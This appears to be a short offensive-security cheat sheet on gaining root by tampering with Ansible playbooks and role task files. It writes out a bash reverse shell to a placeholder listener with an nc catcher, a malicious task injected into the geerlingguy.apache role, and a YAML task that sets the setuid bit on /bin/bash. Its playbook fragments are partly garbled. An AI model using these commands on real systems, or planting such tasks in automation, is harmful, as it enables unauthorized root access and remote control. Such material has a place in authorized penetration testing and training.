# Create a yml file under /opt/ansible/playbooks. You see a geerlingguy.apache role defined.
- name: Install and configure Apache
- role: geerlingguy.apache
- name: configure firewall
# Go to the dirctory /opt/ansible/roles/geerlingguy.apache/tasks, and add a new exploitable file in the directory.
- hosts: localhost
- name: RShell
command: sudo bash /tmp/root.sh
# Then creat a reverse shell in root.sh
echo '/bin/bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > /tmp/root.sh
nc -lvnp <local-port>
# Execute
sudo ansible
sudo -u <user> ansible
# or wait for a root runs the ansible background.
If the target system runs automation tasks with Ansible Playbook as root and we have a write permission of task files (tasks/), we can inject arbitrary commands in yaml file.
# Create or overwrite a YAML malicious file.
echo "[{hosts: localhost, become: true, tasks: [shell: chmod +s /bin/bash]}]" > /opt/automation/tasks/pe.yml
# wait for pe.yml to be executed
# Run and then you are root.
/bin/bash -p